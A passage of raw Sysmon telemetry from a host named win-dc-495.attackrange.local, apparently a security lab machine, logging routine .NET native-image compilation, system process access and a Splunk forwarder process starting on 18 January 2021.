gen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.858{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f3c-0\System.ServiceModel.ServiceMoniker40.dll2021-01-18 13:47:43.858 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:43.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:43.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.780{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.765{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.702{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1308-0\System.ServiceModel.Routing.dll2021-01-18 13:47:43.702 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.327{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.311{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:43.311{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.249{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.171{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c0-0\System.ServiceModel.Internals.dll2021-01-18 13:47:43.171 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.718{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
